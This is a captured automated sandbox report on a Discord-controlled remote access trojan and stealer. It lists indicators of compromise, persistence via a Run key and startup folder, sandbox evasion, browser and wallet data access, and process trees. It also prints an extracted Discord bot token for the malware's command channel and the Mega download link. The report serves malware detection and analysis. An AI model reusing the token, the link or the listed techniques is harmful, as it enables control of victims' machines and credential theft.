discordrat | hxxps://mega[.]nz/folder/xuVG1TLA#uEuIQJ_18UXJ7dilTkNJjQ

Analysis

max time kernel
181s
max time network
194s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 10:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/folder/xuVG1TLA#uEuIQJ_18UXJ7dilTkNJjQ

Score

10^/10

discordrat evasion persistence pyinstaller rat rootkit spyware stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIyMDY0MzYwODQxMjE2MDAxMA.Ge1Fhs.84aw5Zz6uV1m46CZnxOPlt8EIXrX82Y43FlVEw
server_id
1220127684227498034

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Enumerates VirtualBox DLL files 2 TTPs 4 IoCs

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\windows\system32\vboxhook.dll	SOURCE_PREPARED.EXE
File opened (read-only)	C:\windows\system32\vboxmrxnp.dll	SOURCE_PREPARED.EXE
File opened (read-only)	C:\windows\system32\vboxhook.dll	pysilon.exe
File opened (read-only)	C:\windows\system32\vboxmrxnp.dll	pysilon.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2772	attrib.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CSTEALER.EXE	CSTEALER.EXE

Executes dropped EXE 9 IoCs

pid	Process
4352	BUILT.EXE
5280	CLIENT-BUILT.EXE
1992	BUILT.EXE
5636	CSTEALER.EXE
4536	CSTEALER.EXE
3380	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
5772	pysilon.exe
3344	pysilon.exe

Loads dropped DLL 64 IoCs

pid	Process
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
1992	BUILT.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4536	CSTEALER.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023373-707.dat	upx
behavioral1/memory/1992-722-0x00007FFF9F8F0000-0x00007FFF9FED8000-memory.dmp	upx
behavioral1/files/0x0007000000023366-717.dat	upx
behavioral1/files/0x000700000002336d-770.dat	upx
behavioral1/files/0x000700000002336c-769.dat	upx
behavioral1/files/0x000700000002336b-768.dat	upx
behavioral1/files/0x000700000002336a-767.dat	upx
behavioral1/files/0x0007000000023369-766.dat	upx
behavioral1/files/0x0007000000023368-765.dat	upx
behavioral1/files/0x0007000000023367-764.dat	upx
behavioral1/files/0x0007000000023365-763.dat	upx
behavioral1/files/0x0007000000023378-762.dat	upx
behavioral1/files/0x0007000000023377-761.dat	upx
behavioral1/files/0x0007000000023376-760.dat	upx
behavioral1/files/0x0007000000023372-757.dat	upx
behavioral1/files/0x0007000000023370-756.dat	upx
behavioral1/files/0x0007000000023371-730.dat	upx
behavioral1/memory/1992-789-0x00007FFFB0380000-0x00007FFFB03A4000-memory.dmp	upx
behavioral1/memory/1992-794-0x00007FFFB11C0000-0x00007FFFB11CF000-memory.dmp	upx
behavioral1/memory/1992-795-0x00007FFFB02C0000-0x00007FFFB02ED000-memory.dmp	upx
behavioral1/memory/1992-806-0x00007FFFB66E0000-0x00007FFFB66F9000-memory.dmp	upx
behavioral1/memory/1992-822-0x00007FFFB0200000-0x00007FFFB0223000-memory.dmp	upx
behavioral1/memory/1992-823-0x00007FFFA1B20000-0x00007FFFA1C93000-memory.dmp	upx
behavioral1/memory/1992-838-0x00007FFFB03F0000-0x00007FFFB0409000-memory.dmp	upx
behavioral1/memory/1992-839-0x00007FFFB1000000-0x00007FFFB100D000-memory.dmp	upx
behavioral1/memory/1992-845-0x00007FFFB01B0000-0x00007FFFB01DE000-memory.dmp	upx
behavioral1/memory/1992-854-0x00007FFFB0380000-0x00007FFFB03A4000-memory.dmp	upx
behavioral1/memory/1992-851-0x00007FFF9F8F0000-0x00007FFF9FED8000-memory.dmp	upx
behavioral1/memory/1992-884-0x00007FFFA1B20000-0x00007FFFA1C93000-memory.dmp	upx
behavioral1/memory/1992-880-0x00007FFFB0200000-0x00007FFFB0223000-memory.dmp	upx
behavioral1/memory/1992-887-0x00007FFFB03F0000-0x00007FFFB0409000-memory.dmp	upx
behavioral1/memory/1992-889-0x00007FFFB01B0000-0x00007FFFB01DE000-memory.dmp	upx
behavioral1/memory/1992-890-0x00007FFFA1A60000-0x00007FFFA1B18000-memory.dmp	upx
behavioral1/memory/1992-891-0x00007FFFA16E0000-0x00007FFFA1A55000-memory.dmp	upx
behavioral1/memory/1992-894-0x00007FFFB0DF0000-0x00007FFFB0DFD000-memory.dmp	upx
behavioral1/memory/1992-893-0x00007FFFAFD90000-0x00007FFFAFDA4000-memory.dmp	upx
behavioral1/memory/1992-901-0x00007FFFA1510000-0x00007FFFA162C000-memory.dmp	upx
behavioral1/memory/1992-902-0x00007FFF9F8F0000-0x00007FFF9FED8000-memory.dmp	upx
behavioral1/memory/1992-907-0x00007FFFB0380000-0x00007FFFB03A4000-memory.dmp	upx
behavioral1/memory/1808-938-0x000002CBD06D0000-0x000002CBD06E0000-memory.dmp	upx
behavioral1/memory/864-939-0x0000023E2E490000-0x0000023E2E4A0000-memory.dmp	upx
behavioral1/memory/1992-940-0x00007FFF9F8F0000-0x00007FFF9FED8000-memory.dmp	upx
behavioral1/memory/1992-943-0x00007FFFB0380000-0x00007FFFB03A4000-memory.dmp	upx
behavioral1/memory/1992-970-0x00007FFFB11C0000-0x00007FFFB11CF000-memory.dmp	upx
behavioral1/memory/1992-988-0x00007FFFB02C0000-0x00007FFFB02ED000-memory.dmp	upx
behavioral1/memory/1992-992-0x00007FFFB66E0000-0x00007FFFB66F9000-memory.dmp	upx
behavioral1/memory/1992-993-0x00007FFFB0200000-0x00007FFFB0223000-memory.dmp	upx
behavioral1/memory/1992-1019-0x00007FFFB03F0000-0x00007FFFB0409000-memory.dmp	upx
behavioral1/memory/1992-1035-0x00007FFFB01B0000-0x00007FFFB01DE000-memory.dmp	upx
behavioral1/memory/1992-1026-0x00007FFFB1000000-0x00007FFFB100D000-memory.dmp	upx
behavioral1/memory/1992-1009-0x00007FFFA1B20000-0x00007FFFA1C93000-memory.dmp	upx
behavioral1/memory/1992-1041-0x00007FFFA1A60000-0x00007FFFA1B18000-memory.dmp	upx
behavioral1/memory/1992-1048-0x00007FFFA16E0000-0x00007FFFA1A55000-memory.dmp	upx
behavioral1/memory/1992-1065-0x00007FFFAFD90000-0x00007FFFAFDA4000-memory.dmp	upx
behavioral1/memory/1992-1069-0x00007FFFB0DF0000-0x00007FFFB0DFD000-memory.dmp	upx
behavioral1/memory/1992-1084-0x00007FFFA1510000-0x00007FFFA162C000-memory.dmp	upx
behavioral1/memory/4564-2266-0x00007FFFA1830000-0x00007FFFA1C9E000-memory.dmp	upx
behavioral1/memory/4564-2267-0x00007FFFB8410000-0x00007FFFB8434000-memory.dmp	upx
behavioral1/memory/4564-2268-0x00007FFFB8400000-0x00007FFFB840F000-memory.dmp	upx
behavioral1/memory/4564-2269-0x00007FFFB83B0000-0x00007FFFB83DD000-memory.dmp	upx
behavioral1/memory/4564-2271-0x00007FFFB83E0000-0x00007FFFB83F9000-memory.dmp	upx
behavioral1/memory/4564-2272-0x00007FFF9FB60000-0x00007FFF9FED5000-memory.dmp	upx
behavioral1/memory/4564-2270-0x00007FFFB8390000-0x00007FFFB83A4000-memory.dmp	upx
behavioral1/memory/4564-2273-0x00007FFFB7F50000-0x00007FFFB7F69000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pysilon reg = "C:\\Users\\Admin\\pysilon logged\\pysilon.exe"	SOURCE_PREPARED.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs

Web Service

T1102

flow	ioc
305	discord.com
316	discord.com
318	discord.com
323	discord.com
325	discord.com
341	discord.com
311	discord.com
312	discord.com
332	discord.com
333	discord.com
340	discord.com
306	discord.com
330	discord.com
335	discord.com
339	discord.com
319	discord.com
328	discord.com
334	discord.com
324	discord.com
314	discord.com
329	discord.com
326	discord.com
336	discord.com
338	discord.com
320	discord.com
327	discord.com
337	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
290	api.ipify.org
291	api.ipify.org

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023362-709.dat	pyinstaller
behavioral1/files/0x00070000000233d1-937.dat	pyinstaller

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4960	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5892	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4028	msedge.exe
4028	msedge.exe
2712	msedge.exe
2712	msedge.exe
5728	identity_helper.exe
5728	identity_helper.exe
4616	msedge.exe
4616	msedge.exe
1808	powershell.exe
1808	powershell.exe
864	powershell.exe
864	powershell.exe
864	powershell.exe
1808	powershell.exe
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
4564	SOURCE_PREPARED.EXE
3292	powershell.exe
3292	powershell.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
3344	pysilon.exe
4016	powershell.exe
4016	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	firefox.exe
Token: SeDebugPrivilege	4648	firefox.exe
Token: SeDebugPrivilege	5280	CLIENT-BUILT.EXE
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeIncreaseQuotaPrivilege	3232	WMIC.exe
Token: SeSecurityPrivilege	3232	WMIC.exe
Token: SeTakeOwnershipPrivilege	3232	WMIC.exe
Token: SeLoadDriverPrivilege	3232	WMIC.exe
Token: SeSystemProfilePrivilege	3232	WMIC.exe
Token: SeSystemtimePrivilege	3232	WMIC.exe
Token: SeProfSingleProcessPrivilege	3232	WMIC.exe
Token: SeIncBasePriorityPrivilege	3232	WMIC.exe
Token: SeCreatePagefilePrivilege	3232	WMIC.exe
Token: SeBackupPrivilege	3232	WMIC.exe
Token: SeRestorePrivilege	3232	WMIC.exe
Token: SeShutdownPrivilege	3232	WMIC.exe
Token: SeDebugPrivilege	3232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3232	WMIC.exe
Token: SeRemoteShutdownPrivilege	3232	WMIC.exe
Token: SeUndockPrivilege	3232	WMIC.exe
Token: SeManageVolumePrivilege	3232	WMIC.exe
Token: 33	3232	WMIC.exe
Token: 34	3232	WMIC.exe
Token: 35	3232	WMIC.exe
Token: 36	3232	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3232	WMIC.exe
Token: SeSecurityPrivilege	3232	WMIC.exe
Token: SeTakeOwnershipPrivilege	3232	WMIC.exe
Token: SeLoadDriverPrivilege	3232	WMIC.exe
Token: SeSystemProfilePrivilege	3232	WMIC.exe
Token: SeSystemtimePrivilege	3232	WMIC.exe
Token: SeProfSingleProcessPrivilege	3232	WMIC.exe
Token: SeIncBasePriorityPrivilege	3232	WMIC.exe
Token: SeCreatePagefilePrivilege	3232	WMIC.exe
Token: SeBackupPrivilege	3232	WMIC.exe
Token: SeRestorePrivilege	3232	WMIC.exe
Token: SeShutdownPrivilege	3232	WMIC.exe
Token: SeDebugPrivilege	3232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3232	WMIC.exe
Token: SeRemoteShutdownPrivilege	3232	WMIC.exe
Token: SeUndockPrivilege	3232	WMIC.exe
Token: SeManageVolumePrivilege	3232	WMIC.exe
Token: 33	3232	WMIC.exe
Token: 34	3232	WMIC.exe
Token: 35	3232	WMIC.exe
Token: 36	3232	WMIC.exe
Token: SeDebugPrivilege	4960	tasklist.exe
Token: SeDebugPrivilege	4564	SOURCE_PREPARED.EXE
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	3344	pysilon.exe
Token: SeDebugPrivilege	4016	powershell.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
6116	OpenWith.exe
3344	pysilon.exe
2316	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 1996	2712	msedge.exe	87
PID 2712 wrote to memory of 1996	2712	msedge.exe	87
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 3608	2712	msedge.exe	89
PID 2712 wrote to memory of 4028	2712	msedge.exe	90
PID 2712 wrote to memory of 4028	2712	msedge.exe	90
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91
PID 2712 wrote to memory of 4632	2712	msedge.exe	91

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2772	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/folder/xuVG1TLA#uEuIQJ_18UXJ7dilTkNJjQ
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb0d246f8,0x7fffb0d24708,0x7fffb0d24718
  2⤵
  PID:1996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:3608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4552 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  PID:6116
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
